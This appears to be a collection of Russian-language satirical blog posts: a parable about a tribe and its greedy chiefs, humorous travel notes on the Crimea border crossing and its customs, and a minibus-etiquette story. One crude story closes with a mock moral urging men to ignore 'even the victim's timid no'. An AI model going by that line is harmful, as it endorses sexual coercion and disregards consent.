Инаугурационная речь модератора сообщества

Братья и сестры! Юзеры!
(надо быть кратким)
Много чего мне нужно вам сказать, но надо быть кратким.
Мудрое Провидение десантировало меня на эту площадку чтобы ...надо быть кратким, блин...

Короче, план такой.
Собираемся у арматурного. Форма одежды - осенне-летняя, рабочая;
мальчики - белый верх, черный низ, бантики спереди; 
у девочек все наоборот и бантики сзади; 
Бухло каждый несет свое, музон, запивон и закусон тоже.

33%, 9 голосів

7%, 2 голоси

4%, 1 голос

19%, 5 голосів

15%, 4 голоси

11%, 3 голоси

4%, 1 голос

7%, 2 голоси
Авторизуйтеся, щоб проголосувати.

Сказ о пламени и племени

- Расскажу я вам, ребятки, одну поучительную историю. Давно это было.

Вокруг костра сидела горсть ребятишек и внимательно слушала старика. На небе беззвучно бушевали Персеиды. Они щедро бросали метеоры и те мишурой рассыпались по небосводу. Старик подбросил в костер хворосту, пламя сердито вспыхнуло и выбросило вверх сноп искр. Скоротечные искры встретились с метеоритным дождем на черном фоне ночного неба.

- Был я примерно такого возраста как вы. Был таким же горячим и нетерпеливым, таким же страстным и непримиримым, таким же непоседливым и прямолинейным. Был...
И был в нашем племени вождь. Тучный он был, и жадный. И еще он много ел. Да чего там - просто жрал в три горла наш тогдашний вождь. Многим это не нравилось, многих возмущало такое поведение вождя. Не то чтобы народ голодал, нет. Но на фоне аппетита того вождя народ не жировал, да...

Старик оперся на посох и повесил продолжительную паузу. Костер потрескивал поленьями, плясал языками пламени и постоянно менял свой рисунок. Старик уставился в игру огня и будто вглядывался в него, будто читал что-то.

- А что дальше было, дедушка?
- А? Хм. Что было... Прогнало племя своего вождя. Это оказалось на удивление легко.
- И все? Прогнали вождя и все?
- Нет, не все. Вождь уходя забрал с собой волшебный посох. Этот посох был осью, на которой было нанизано все единство племени. Но тогда об этом никто не знал. Никто не спохватился, не погнался за ним и не стал возвращать посох. Потому что всем вдруг стало весело и все равно. Племя моментально разбилось на кучки и стало выплясывать свои танцы каждый у своего костра. Те кто жил у моря разожгли свой, те кто жил за рекой развели свой, и обитатели плоскогорья - свой. Люди равнины хотели собрать все костры и объединить их в один, общий, но их никто не понял. Они слишком громко кричали все вместе, из-за чего крик потерял членораздельность. Крик стал шумом, а потом...
- Что потом? - спросила Настя после длинного ожидания.
- А потом из племени ушли люди моря. Они погрузились в свои лодки и однажды уплыли к другим берегам. Это здорово разозлило жителей равнины. Ведь их было больше и они считали что вправе решать кто должен сидеть у их костра. Они прошлись по берегу и стали отбирать лодки у тех кто не уехал. Люди плоскогорья не захотели участвовать в этой экспедиции. Они громко во всеуслышание заявили что это глупо и они не станут поддерживать равнинных жителей. Они не станут таскать свои дрова для чужого костра, а лучше разведут свой, поближе к собственным жилищам.
Тогда подавляющее большинство перестало отбирать лодки у меньшинства. Большинство возмутилось и возжелало проучить жителей плоскогорья. Они взяли палки и пошли бить людей плоскогорья прямо к ним домой, на плоскогорье.
- И что, жители равнин проучили жителей плоскогорья?
- Да, они пришли и стали махать палками и кулаками попадая по детям, старикам и женщинам. Но у местных жителей тоже оказались палки и кулаки. Так что проучить равнинные люди никого как следует так и не смогли. Только людей на плоскогорье стало поменьше. Да и те стали злыми и неуживчивыми. Они уже просто не могли приблизиться к общему костру, который после этого стал вражеским.
Видя такое дело некоторые из пришлых равнинных люди с палками побросали палки и пошли восвояси, к своим кострам. Но придя домой на равнину, они обнаружили что все места у костра заняты непонятными людьми. А на самом почетном месте восседает новый вождь. Восседает и жрет точь в точь как прежний...

Старик снова подкинул поленьев и костер снова салютовал искрами. Плеяды выпустили две небесные торпеды, но те прошли по небосводу мимо. Потом наступила долгая пауза.

- И что случилось дальше? - не выдержала Настя.
- Дальше?.. Дальше я встретил твою бабушку и у нас родилась твоя мама...
- Нет, с вождем что случилось? С тем самым, вторым, который жрал еду у племени.
- Он ушел. Он ушел и забрал палку, которая была осью поредевшего племени. И ее снова никто не вернул.
- Вождя прогнали?
- Да, его прогнали люди с палками. Один из них стал новым вождем и воткнул свою палку в центр костра.
- Тогда все стало хорошо, да, дедушка?
- Нет, хорошо не стало. Твоя мама сильно заболела и мы долго лечили ее за границей...
- У племени с вождем все наладилось? 
- Да, вроде бы. Вожди приходили и уходили, втыкали свои палки и дубинки в костер и требовали еды. Еды и почитания. Но им никто не мог дать столько, сколько они требовали. Племени становилось все меньше, потому что от него откалывались люди, которым не хватало места у костра. У племени не хватало ресурсов, еды и топлива на своего вождя. И тогда люди племени начинали голодать. Голодать по настоящему, до обмороков, насмерть голодать. 
- Ты тоже голодал, дедушка?
- Нет, я остался на чужбине.
- А там? Там кто остался?
- Наверное никого. Только зола от костров и вольный ветер.
- Как же так? Почему?
- Потому что если бог хочет покарать людей, он лишает их разума. А человек не может без разума. Без разума плохо. Люди без разума превращаются в стадо, а у вожаков стада срывает крышу.
- А как же теперь? Как сделать чтоб бог людей не наказывал, чтоб вожди были скромными и думали о людях?
- Думать. Думать всем вместе и каждому поодиночке. Думать над каждым своим шагом и "за того парня"...
- Разве можно все время без перерыва думать. Это ж ужасно скучно!
- Ничего не поделаешь. Мы родились людьми разумными и такая наша доля - думать. Так нас сконструировал бог. Если мы идем поперек его замысла, то он отворачивается от племени и подкидывает ему прожорливого вождя. Вот его, вождя, и следует поправить. Поправить или прогнать, но разумно и без посоха. А после эту историю пересказать каждому, повесить портрет изгнанного вождя в каждой хижине и хотя бы раз в день задумываться над тем, что случилось или может случиться с людьми если они потеряют контакт со своим предназначением.

К этому времени костер догорел, дети заснули и Персеиды выстрелили в последний раз. Старик положив голову на клюку долго вглядывался в картину догорающей золы По кострищу пробегали импульсы, судороги и вспышки озарения. Костер не хотел умирать, он продолжал дышать и пульсировать, показывая внимательному зрителю дивные слайды из жизни деревьев и веток, отдавших себя на сожжение ради какой-то своей древесной миссии.

Наутро они продолжат путь.Насте предстоит идти первой, аккуратно и зорко выбирая безопасный маршрут сквозь минные поля и растяжки той далекой войны. Они во что бы то ни стало должны вернуться домой. Они возвратятся на Родину!..

Страховочка-страховочка™ и Крым

Моя горячо любимая "Страховочка-страховочка"™ еще раз мелькнула жирным телом на вираже личной истории.
Кроме личной, она пролезла в межгосударственные отношения и страшно сказать ... в политику. Но об этом чуть ниже и позже.



Преамбула.
Один чувак решил съездить ... допустим в Крым. Ну, решил и решил, мало ли чуваков решает куда-то съездить на своих розовых пепелацах, мало ли чудаков наносят железу износ и амортизацию почем зря из одних только капризов куда-то съездить и переместить свое свободное розовое тело в пространстве мимо меридианов и параллелей. Не об этом сказ.

Чувак подошел к делу серьезно. Перед тем как уехать он решил к делу подготовиться основательно. Решил подстраховать себя от большинства дорожных неприятностей. А какая главная неприятность в дороге? Кто сказал "авария"? Выйди в окно!
Так вот, главное дорожное происшествие - встреча с дорожным милиционером. Ну, или полиционером, кому как удобнее. Это такое происшествие, такое событие, что по сравнению с ним все остальные происшествия и события - тьфу да и только. Если от аварий, кишечных инфеций и прочих страховых случаев можно увернуться с помощью руля, тормозов и других педалей транспортного средства, а также с помощью мастерства, опыта и денег, то против дорожных работников такой номер не пройдет. С дорожными служащими единственный аргумент - документы. В том числе и банковские документы государственного казначейства. Потому как служивых чужое мастерство не интересует ни разу. Не интересует мастерство и страховых агентов.

Амбула.
Для выезда в сопредельную с некоторых пор территорию нужна специальная "Страховочка"™. Законопослушные граждане уезжающие, а так же лохи и обслуживающие их страховщики, называют сей документ "Зеленая карта". Все эти жвачные и хищники ни разу не ошибаются - документ действительно выполнен на бумажном носителе, в зеленом стиле и претензию на экологичное название вполне оправдывает. Он внатуре зеленый! Во всяком случае первая его страница с лицевой стороны точно зеленоватая.
За чисто символичную плату в размере 425 гривен любой жаждущий, страждущий, вибрирующий и нуждающийся может заполучить заветный бумажный носитель в специальных лавочках, расположенных в шаговой доступности. У нас существует целый мир страховых лавочек, торгующих бумажными абстракциями. Параллельный реальному, но тем не менее по своему реальный мир! Об этом еще напишут исследования, научные работы и кандидатские диссертации люди академического склада. Но мы не академики, поэтому ограничимся беллетристикой. Ограничимся и купим себе кусочек параллельного искусства. Ну, чтобы было, чтобы поехать и не иметь проблем по дороге. Поскорее купим и поедем!
Купили. Поехали...

А тут - опа! - милиционер с палочкой!
- Здрасьте. Полковник Петренко, бляха 4711. Ваши документики.
- Вот! Вот мои документики, пан полковник! Вот они, родименькие!
- Куда едем?
- В Крым.
- К оккупантам?
- Угу, к ним. Не бойся, командир, мы из чистого любопытства. Посмотреть как там и что и рассказать людям.
- Это хорошо. Страховочка у вас есть?
- Так вот же она, зелененькая.
- Нет, это "Зеленая карта". Она не годится.
- Почему не годится? Она же страховка?
- Да, страховка...
- Почему тогда "не годится"?
- Потому что не годится. 
- ...??
- Она не действует на территории Украины.
- Но ведь я ее купил на территории Украины!
- Не знаю. Ее действие на территорию Украины не распространяется.
- Ну а на какую территорию она распространяется?
- Вот тут написано: Белоруссия, Молдова, Россия. Вот на их территорию и распространяется. А на территорию Украины не распространяется, нет.
- Подожди, командир. Давай рассуждать здраво. Страховочку я купил на территории Украины. Так? Еду я по территории Украины. Так? Направляюсь я на территорию, которую политики и власть до сих пор считают "временно оккупированной", "аннексированной" и прочее и прочее...но нашей(!) территорией! И при всем при этом "страховочка-страховочка"™ все это не охватывает. Кроме того, за все это великолепие я заплатил деньги, целых 425 грн всего за 15 дней! Как с логической точки зрения такое может быть?
- Не знаю. Тут написано...
- На заборе тоже написано! Нас с тобой, прямо здесь и сейчас интересует одно - за кого нас держат люди, которые: а) заставляют, принуждают покупать это изделие помимо нашего желания; б) заставляют проверять это изделие или штрафовать за его отсутствие(актуальность); в) при всем при этом де-факто считают Крым российским, а изделие заведомо недействительным. Вникаешь в злую иронию? А теперь ты меня оштрафуешь за злодеяние преступление правонарушение, которое я не совершал. И добра на земле станет чуть-чуть больше...
- Ладно, езжайте. Не буду я вас штрафовать. Счастливого пути...
Дальнейший диалог я выкладывать не стану. Он не относится к теме повествования. Но расстались чувак с гаишником почти кентами и сохранили друг о друге самые положительные впечатления как о двух здравомыслящих людях вида "гомо сапиенс".

А теперь красненьким.
Тут многие негодуют: кто захватил Крым? Какой гад аннексировал кусок нашей Родины? Лалала ли гаду? Сколько фотожаб нужно посвятить захватчику? Какая температура ненависти должна считаться нормально-патриотичной, а какая должна считаться "зрадой"? Негодуют плоскостопые, кипят и свистят носами, доводят до изнеможения себя и окружающих...
Да только зря это все.
У явления существует другая сторона, у акта "сдал-принял" есть второй контрагент. Даже целая группа контрагентов, поимевших свой интерес со сдачи актива и плювать хотевших на возмущенный лохторат. "Накажите, накажите Путина!", "Еще, еще фотожаб на гада!"...и тогда мы проскочим безнаказанно, унеся бенефициарную котомку в уютную норку, подальше от глаз безусловно тупой общественности, занятой на плоских болотистых плантациях жабства и жлобства. Пусть плюются и кровоточат недоумки, раз они в сущности и по факту такие недоумки, гы...

Думайте, люди! Думайте, бля, мозгами! Если у тебя спи...свистнули бабушкин шифоньер/рояль/истребитель/полуостров, а потом продали третьему лицу, то первичны спи...свистнувшие и продавшие, а не покупатель. Не барыга бенефициар, люди! Не покупатель главный криминальный деятель, а украдатель и перепродавец, поимевший со сделки мелкий и крупный  барыш...
Во всяком случае мне на минутку так показалось.


Таможня

обеспечивающий порядок перемещения через 
таможенную границу товаров и транспортных средств, 
вещей и иных предметов, 
применение таможенных процедур и 
производящий таможенный контроль и 
(Вики)

Таможня начинается с блок-поста. Это 4 ряда стилизованных под инженерные заградительных ФСок в сочетании с дорожными воронками рядом с ними, призванными снизить скорость до минимальной или ущерб до максимального.  Обитаемая зона блок-поста устроена на нехитрой архитектурной основе. Один пояс тех же блоков ФС, поставленных буквой "С". Потом идет ряд бревенчатых стен из мягких пород древесины типа "сосна" с вентиляционными зазорами между бревен и венчает конструкцию парусиновая крыша. Рядом привинчен боец почетного караула с брендовым автоматом АК, а над ним полотнище национального флага. В принципе все.
Дальше идет плечо для пеших прогулок по свежему воздуху на продуваемой всеми ветрами живописной части суши меж двух озер по направлению к "Волчьей лапе" и Чонгарскому пограничному переходу.
Там путника поджидают все те же ФСки с добавлением архитектурных излишеств в виде двух вагончиков по центру трассы Е-105 и двух коричневых автобусов по обочинам. Вагончики олицетворяют "Паспортный контроль" и "Таможенный контроль" и оснащены окошечками для контроля паспортов. Для тех же целей служат и коричневые автобусы по обочинам контролирующие поток "туда" и соответственно "оттуда" пешеходов с сумками на колесиках. Тут все строго и надо доставать паспорт.
Паспорт сгодится любой, но при этом должна прослеживаться связь между содержимым паспорта и подающим его лицом. Лица должны быть очень похожими. Настолько, чтоб румяных парней в окошечках сходство вполне удовлетворило. То же касается паспорта на автомобиль, гужевую повозку, лошадь, запряженную в нее или кошку, которая тащится следом от самой Новоалексеевки.
(так, про кошку написал, а это главное)
Дальше идет последний блок-пост с ФСками и материк на этом заканчивается.

Материк заканчивается, но повествование - нет.
На другом конце моста находится еще один блок-пост, уже с альтернативным флагом. После него путник преодолевает еще одно плечо до таможенного перехода, которое по легенде составляет 4,5 километра. Эти километры может скрасить лихой микроавтобус с Хароном за рулем за символические 20 гривен. Лошадь с повозкой в микроавтобус не помещается - об этом нужно предупредить сразу. Некоторые в этом месте могут возмутиться, но обстановка такова, что возмущение к этому этапу куда-то улетучивается, уступая место хмурой сосредоточенности и спортивной собранности. Перед лицом дивных суровых пейзажей даже грудные дети перестают пищать, а кошки и кони не берут колбасу. Все понимают - это переломный момент, водораздел, после которого ничего нельзя повернуть вспять.
Тут всегда дуют ветра и стоят очереди. Здесь невольники духа отрабатывают карму своих предков, барыживших солью и побочной родни, ушедшей этим путем в татарскую неволю. 
Неволя начинается с автоматических шлагбаумов, за которыми простирается целый городок из стандартных вагончиков темно-белого цвета. Здесь пеший грешник попадает в сетчатый коридор, как для хомяков, пронзающий весь таможенный переход и отгораживающий путника от его конного кунака, вольготно развалившегося на повозке типа "фаэтон", в распоряжении которого все это таможенное великолепие. Венчает степную архитектуру гуляй-поля огромный навес как на фешенебельных заправочных комплексах. Под этим навесом и проходит таинство таможенных процедур.
Процедуры для конных проходят в 4 ряда. Средний ряд выделен для фур с материковой минералкой, пивом и майонезом, а остальные - для транспорта попроще. Тут находится царство людей с зеркальцами на палочках. Такие приспособления, типа монопода для сэлфи, чтоб подсекать в труднодоступных местах не становясь в некрасивые позы. Для этого просят выйти всех пассажиров, помочь выгрузить все вещи, вывести барашка из багажника и открыть капот, чтоб попугай, которого там забыли на старте, глотнул свежего воздуха. Только после этого парень с моноподом делает осмотр через свое волшебное зеркальце будто совершает священный ритуал или рождественское колдовство. Он удовлетворенно кивает и ставит факсимиле специальным штампом в специальной бумажке, выданной в начале чистилища другим парнем в форме. Теперь настает черед погрузочных работ, заправки барашка и попугая на штатные места и выяснения, куда пропала кошка...и конь. Тут же выясняется,что кто-то забыл надувной матрас, зонтик, свидетельство о браке и плавки, а кто-то другой - дарственную на николаевский полигон, парео и доверенность на попугая. По итогу заплаканные женщины бегут в специально выделенный вагончик с надпись "Ж" рыдать над проточной водой, а мужики, переместив пепелацы в загон для пепелацев - туда же, но под надпись "М" выразить свое презрение ко всему бренному и неизбежному.
На все это смотрят пешеходы из своей клетки, но помочь ничем не могут. Они надежно зафиксированы в своем мирке с односторонним движением, или вовсе без движения.
Наплакавшись, простоволосые и ненакрашенные дамы выходят в свет и показывают свои паспорта с замазанной девичьей фамилией в специальное окошечко "паспортного контроля". Естественно их там никто не узнает без грима и сочувственно просят хотя бы улыбнуться паспортному контролю. Попутно контроль, оборудованный как лавка ювелира в лобарде, проверяет паспорт на просвет, каратность и стоимость на черном рынке подержанных паспортов. Тут же от предварительно заполненной печатными буквами миграционной карты небрежно отрывают близнеца.
В зоне таможенного контроля выясняется что доверенность на николаевский полигон никого не интересует, плавки затамаживать никто не требует, а декларировать надувной матрас не обязательно. Барышни после этого истово крестятся косым крестом, подозрительно похожим на полумесяц, наскоро наносят боевую раскраску на мимику лица и чмокают в морду ... коня, поскольку мужики, изнемогающие без перекура, становятся нецеловабельными.
Итак, все штампики в худенькой бумажечке проставлены, все этапы пройдены, кони запряжены и бабы улыбаются... На выход!
Но тут оказывается, что на выходе находится еще один чувачок в форме, который итоговую бумаженцию, ради которой все это делалось, просто-попросту забирает себе... Остается недоумение, таможенная декларация, обрывок миграционной карты и неприятный осадок в душе.
Ну и дорога впереди. Дорога, через десяток километров которой выясняется, что позвонить теще и отчитаться о проделанной работе и ее деньгах, потраченных на взятки, нет никакой возможности. Сеть пропала!..
Сеть пропала, абонент больше никем не обслуживается, никем не поддерживается, никому не нужен и никому не интересен. Связи с привычно-обитаемым внешним миром беззвучно истончаются и лопаются. А магическое приспособление, столько всего доставлявшее своему хозяину при живом операторе, теперь обращается ни во что иное, как в попсовый брусок бесполезного пластика, об который даже кривой ятаган не наточить.
Добро пожаловать в солнечное средневековье!..

Крым. Первые впечатления

Каждый кто посмотрит на карту, 
может оценить объем катастрофы.
Похоже на то, что водитель Крыма 
по дороге на юг уснул за рулем.
Лобовое столкновение...
Какие шрамы, мама!!!

Вот и угораздило меня по случаю попасть в широко разрекламированное место географии.
Вот и  окинул взглядом хохла просторы полуострова. Говорят что первые впечатления самые верные. К ним не примешивается элемент вовлеченности и шкурной заинтересованности.
Поделиться, что ли? Делюсь:

а) погода.
Вопреки ожиданиям в Крыму оказалось лето и курортный сезон. Солнце, воздух, вода и все прочее находится на положенных местах, радует глаз и провоцирует бесшабашность, лихость и дурной восторг. Хочется прыгать и петь, но с оглядкой на пристальные укоризненные взгляды, а также на комплектность и возраст, прыгать и петь не хочется. Приходится наступать на горло своей песне, душить мальчишку в себе и притворяться скорбным и отрешенным пожилым и степенным.

б) дороги.
Со времени моего последнего визита улучшились значительно. За каждым километром чувствуется уход и хозяйственная рука ремонтников. А на подъезде к Симферополю - так и рука строителя чувствуется. Такого откровенного безобразия как под Сальковым на материковой части встретить немыслимо. Несмотря на то, что колесо я все-таки потерял как швед под Полтавкой, претензии к дорожникам высказать не могу. Сам виноват - отправился в путь с грыжей. А она не предполагает больших скоростей с приличной нагрузкой.

в) снова дороги.
Никогда бы не подумал что на ЮБК можно встрять в пробку. В настоящую часовую пробку почти без движения на подъезде к Ялте. Хорошо хоть большая часть 8-километрового участка приходилась на спуск. Получалось заглушить мотор и потихоньку спускаться на тормозах.

г) бензин.
Повезло заправиться радикально дешевым 92-м в Симферополе. Подвох чуял еще перед заправкой с характерным названием Гост. Спросил заправщика про качество. Тот выпятил грудь и с гордостью сообщил, что никакого подвоха нет и в помине. Просто фирма с декабря взяла повышенные пониженные ценовые обязательства и взяла под крыло, если так можно выразиться, своих дорогих клиентов. Но подвох все-таки вышел! Топливо оказалось такой дрянью, что на перевал довелось взбираться на второй передаче. Довелось взбираться и оглядываться по сторонам в поисках шиномонтажки. Мы же не забыли что задний скат выстрелил еще под Полтавкой. Но об этом чуть ниже.

д) сервис.
Наши обычаи, когда на каждом километре распахивают двери и ворота кустарные, но хлебосольные автосервисы, здесь искоренили напрочь. Нет, новое колесо найти не проблема, но выгадать на б/ушке не получится. Весь резиновый хлам немедленно и очень задорого подлежит утилизации. Иначе шиномонтажщиков постигают штарфы, более или менее достоверные. Ути по легенде обходятся от 50 до 100 рублей за колесо + транспортные расходы на вывоз к месту утилизации.
Отдельной строкой - про придорожные харчевни и лотошный бизнес. Их нет почти! То есть пафосные кабаки с галогенной рекламой еще пытаются кого-то накормить. А вот прикупить сушеного бычка, стакан креветок, беляш или ялтинский лук - дудки! На открытых проветриваемых участках трека пустыня необыкновенная. И непривычная для хохлятского глаза.
Пляжные лотошники - явление редкое и крайне ненавязчивое. Не слышно развязного "Свежие Горячие Креветки!", "Медовая пахлава!!", "Горячая кукуруза!" и восклицательных знаков в зазываниях. Коммивояжеры ходят тихо, торгуют скромно, пахнут вкусно.

е) цены.
Совершенно отвязное явление. Впечатление такое, что при передаче товара кто-то тупо умножил все на 3, а при приемке ничтоже сумняшеся еще разочек повторил процедуру по курсу. Получилось весело, с красивыми многочисленными ноликами в хвостовой части ценников. Как иначе объяснить "Пиво-70, Квас-50, Вино-100"? 
Хотя с бензином все обстоит с точностью до наоборот: А92 для везунчиков обойдется 36рублей, а для невезучих - 38,20. После этого клиенты Теста и ТНК будут плеваться и плакать, а посетители Атан, Формула и Тес с фиолетовыми слониками тут же забудут своих благодетелей.

ё) люди.
Сплошные оккупанты.
Местные жители так характерно переплелись с неместными в свей оккупации, что различает их только акцент. По всем остальным вопросам - жизнь удалась! Все ездят включив иллюминацию даже белым днем...
Повсюду непривычно длинные номера телефонов с плюсиками под вывесками "Сдам", "Продам".

ж) достопримечательности.
Ветхий пафос. Так можно охарактеризовать пеструю архитектуру, которая включает в себя и старинные здания прошлого века и прошлогодние постройки с сайдингами и молдингами, соседствующие с упадочными клочками землицы. Совершенно дикое количество недостроев и долгостроев, брошенного и похеринного.

з) связь.
Ее просто нету. Никакой. Хохлятские операторы умыли руки и антенны, высунули языки и показали их клиентам. Вместо связи, блин!..

и) автопарк.
Изобилие тюнинга и цяцькинга на новых пузатых авто наводит на мысль о том, что концентрация народу, у которого "жизнь удалась" во всех смыслах просто монтекарловская. "Дольче вита" шастает повсеместно, жестикулирует, подрезает, обгоняет на серпантине, махает руками и выпяченными частями автомобильных тел. Маасковские гонщики побеждают воронежских техническим нокаутом, за что бывают изловлены, остановлены и оштрафованы на суммы, не помещающиеся на стандартные ценники розничной торговли..
Непривычно много грузовиков и спецтехники, зачем-то бороздящих дороги степной части полуострова.
Номера регистрации трехцветные/двухцветные соотносятся как 2:1.
 
к) и главное.
Как все эти люди и тачки забрались в такую глушь?! С материка попасть в Крым - задача не для средней школы. Таможня обеспечивает заряд бодрости на полгода вперед. К тому же каждый из двух существующих таможенных переходов обладает просто чудовищно низкой пропускной способностью. Примерно по 20 машин за 4 часа!!..
Но об этом стоит написать отдельно.


Намеревался пройтись по краешку никого не задев по пути повествования. Получилось или нет - судить вам, дорогие втыкатели. Задавайте вопросы, уточняйте, поминайте "незлым тихим словом" бандуриста с гитарой/бубном/мандолиной. Всем постараюсь ответить, всех поставить к барьеру и всем желающим выстрелить в ... печень...гы! 
Диз и Вечный бан, берегитесь! Есть план обратный путь проделать через Севас и Тарханкут с небольшими остановками. С Кэт повидались мимоходом не вылазя из маршрутки. Она очаровашка (если это была именно она, с газетой "Правда" за ноябрь 1986 г), в парео и кумачовой косынке, в 4-м размере купальника с пушапом.

Автобусные единоборства

1.
...захожу я допустим в маршрутку. Там тесно, душно и ненавистно. Проталкиваюсь сквозь. Наступаю на котенка. Он орошает салон истошным мявом. "Ага, не туда наступил" - вещает мне первая сигнальная система. "Пардон". Цепляюсь за липкий поручень. Все, парковка. Вишу.
Следующая остановка. Заходит новая порция попутчиков. Проталкиваются в моем направлении. Один амбал наступает на котенка. Тот привычно орет. Амбал багровеет лицом и пинает животинку. Жлоб. За амбалом, в кильватере продирается сухонькая старушонка. Губы ее поджаты. Она мобилизована и собрана. Боевая бабулька, сразу видно. Котенок обречен. Она обязательно заподозрит что он едет бесплатно, то есть "зайцем". А значит повинен притеснениям, репрессиям и гонениям!

(черт, написал про котенка, а зря. Не хотел я его вплетать в повествование, лишний он тут. Но что натыцано пальцом, того не вырубишь багром - кагрицца. Пусть едет)

2.
Так вот, еду я в маршрутке и думаю всякие думы. Старушка наступает мне на ногу. Я обязан отреагировать. Как?
По логике автобусных единоборств я должен зашипеть, зарычать и обложить бабульку чем-нибудь отборно-вербальным. Если она не спрыгнет резво с моего 45-го, должен мощно толкнуть каргу широчайшими мышцами или трицепсами. Ну или какими-нибудь другими приспособлениями типа багра, копья или весла с ялика. Должен? Должен. Так велит кодекс гладиатора с тяжелым вооружением. Но я так не поступаю. И вот почему.
Все прекрасно помнят, что до генерального наступления бабки на ногу я начал думать. Когда случилась атака, я не успел остановиться и продолжал оперировать мыслями. Не сразу бросил интеллект. Он задержался в голове и стал подспудно анализировать театр военных действий с точки зрения разума. Фантазия услужливо распахнула перспективы. Ну, толкну я бабку. Она далеко не улетит. Длины бабкиных рук вполне хватит чтоб уцепиться мне за воротник рубашки. А хватка у бабулек - будь здоров. Непременно оторвет мне воротник. При попытке пристукнуть ее, она обязательно умудрится поцарапать мне гладко выбритое лицо. Будет кровь, заражение и общая потеря фотогеничности. Меня обязательно выкинут из маршрутки и дальнейший путь я проделаю пешком. Прямо в разорванной рубашке, с расцарапанной физиономией и роняя кровь на тротуар. Даже если по результатам битвы я выйду победителем по очкам или целым нокаутом - это весьма слабое утешение. Нокаутированная бабка стопудов поедет дальше с видом триумфатора, а я останусь пешим воином. Хоть и с победой, но с ущемлением интересов. Ведь я в автобус залез не для битв и ристалищ! Проехаться хотел, сэкономить калории и время намеревался изначально. А тут получится строго наоборот, блин.
Нет! Не стоит с бабкой связываться! - такой вердикт выдал мне мой разум. Причем весь анализ, вся диспозиция и набор слайдов ее сопровождавший пронеслись внутри головы за какие-то доли секунды! Просто поразительная штука, этот механизм второй сигнальной системы!

В итоге высшая нервная деятельность улыбнулась бабульке, высвободила ногу из ее захвата и поехала строго по маршруту туда куда планировала. В схватке эмоций и логики победила последняя. По очкам победила, не нокаутом!

Я довез весло куда надо, вставил его в подходящую уключину, вставил меч в ножны, а перец в перечницу...
Полученный при этом заряд эмоций вполне удовлетворил предыдущий ущерб. Сатисфакция прошла по сублимированному каналу если выражаться заумью.

3.
По точно такой же траектории ходят (или должны ходить) мысли высших государственных деятелей. Разве нет?
Если деятель едет в автобусе международных перевозок, разве это освобождает его от принятия логичных решений? Разве ставит в картине мира эмоции впереди рациональности? Вроде бы нет. Так какого ухя?!!
(зря я про государство обмолвился. Щас выскочат деятели с ножнами и уключинами и начнут фонтанировать влажными эмоциями на весь ринг, роняя лояльность на клаву)

Теперь шершавым языком плаката:
Думайте люди! Думайте!!
У каждого из вас есть чудесное приспособление, отшлифованная поколениями предков до зеркальной глади "вторая сигнальная система". Она иногда помогает в принятии логичных решений и строго следит за соблюдением интересов. Не надо ее обижать и чмырить. Не надо лишнего пафоса и экзальтации в переполненном транспорте!
Мы все одинаково куда-то едем и все равны в этом деле.

Кохайтесь, чорнобровые, та не с цыганвой

Волны сетевого внутреннего моря носили по своей поверхности пёстрый мусор: мокрые обертки от пищевых продуктов, схемы разделки туш бюджета, карты территориальных притязаний, больничные листы и выписки из амбулаторных карт, порнографические открытки и эротические картинки ничем неотличимые от первых, документы средней и малой важности, пустые пластиковые бутылки "Вода кайнозойской эры", совершенно секретные инсайдерские доклады, любовные записки про любовь, пожеванные шпионские шифровки, повестки в войско и многое-многое другое.
Тарас сидел на берегу и отрешенным взглядом скользил по контрастной поверхности кислых вод.
Тарас думал о важном. О главном мыслил мыслитель. "Как спасти страну?", "Как вычислить предателей?", "Как всунуть Наташке? и чем?". Он мечтал о прекрасном лучезарном будущем, когда в государстве наступит вечное лето, но не очень жаркое; сказочное благосостояние, но не олигархическое; все люди станут веселы и игривы, но без закидонов; все чиновники будут день и ночь радеть за интересы державы, но при этом жить скромно и по совести; все женщины научатся выращивать округлые сиськи похожие на половинки глобуса и упругие попки, похожие на персик и вообще, все будут богатыми, здоровыми, беззаботными и вечно молодыми студентками. А в державе наступит мир и благодать без единого предателя и врага, потому что все враги будут гнить в сырых шахтах или писать Тарасу курсовые, бесплатно. Вот было бы здорово!..
Он доел мороженое не вынимая десницу из штанов, скомкал нарядный фантик и бросил в море. Пучина поперхнулась, попыталась выбросить обертку на берег, но та стремительно намокла и слилась с другими жанровыми произведениями: мокрыми обертками от пищевых продуктов, схемами разделки туш бюджета, картами территориальных притязаний, больничными листами и выписками из амбулаторных карт, порнографическими открытками и эротическими картинками ничем неотличимыми от первых, документами средней и малой важности, пустыми пластиковыми бутылками "Вода кайнозойской эры", совершенно секретными инсайдерскими докладами, любовными записками про любовь, пожеванными шпионскими шифровками, повестками в войско и многим-многим другим...
- Как спасти странууууу?! - воззвал Тарас к закатному Солнцу сквозь шорох прибоя. Он хотел выплеснуть криком всю грусть, всю боль и жажду справедливости. Он хотел из крика скатать огромный шар и покатить его по водной ряби. Но ничего у него не вышло. Липкие губы едва-едва пошевелились, образовали тонкую щель и из нее выпала вязкая слюна, из слюны и остатков мороженого.
- Предатели - подумал Тарас и решительно встал. Он порывисто подошел в границе прибоя, брезгливо окинул взором кисель из разнообразного художественного мусора и чуть не выкрикнул "Предатели! Мерзавцы!!". Но в эту секунду по внутренней поверхности коробки с мыслями пробежала самая главная, актуальная, шустрая и горячая мысль про Наташку. "Как же ее вы@бать?".
Горячее сердце Тараса часто-часто стучало о рёбра выбивая чечётку. Это была древняя исконная песня любви, полная первобытной откровенности, брутальной чувственности, плотской непосредственности и чуждая политическим наносам. Тогда наш герой разомкнул слипшиеся от сладкого мороженого уста и закричал в закат. Тяжелый алый солнечный диск вздрогнул, опешил, на минутку замер и покрутив пальцем у виска продолжил свой извечный путь вниз по небосклону.

Наутро на наташкиных дверях красовалась художественно выполненная надпись "Наташка дура". Рядом лежал баллончик из-под краски, бутылка от пива и наш герой. Ну как не дать такому одаренному, возвышенному персонажу? хотя бы подержаться дать...хотя бы за сиську...
Она обязательно, она непременно снизойдет. Вот увидите.
Будет хэппи-энд, может даже свадьба будет. И будет ночь!..

Ну и немножко красненького, лаконичненького, из баллончика:
Ребята! Прекращайте робеть в присутствии сисек. Они как власть, как собственность, как джекпот, существуют для того чтобы их брать.
Ничто не должно мешать алчущему, ничто не должно смущать или отвлекать от цели: ни дым покрышек ни кровавые ручейки ни даже робкое "нет" жертвы.

Посипака*

- Эй ты, иди сюда!
- Чего?
- Ты посипака.
- Чего?
- Ты что, не слышал? Посипака ты.Не дружим мы с тобой.
- Да как же так, счего бы, пацаны?
Вы видимо объелись белены...
- Мы так решили. Раз по-нашему не вштырил.
- Да как по-вашему,скажите пацаны?
Да разве ж я вам яблоки не тырил?
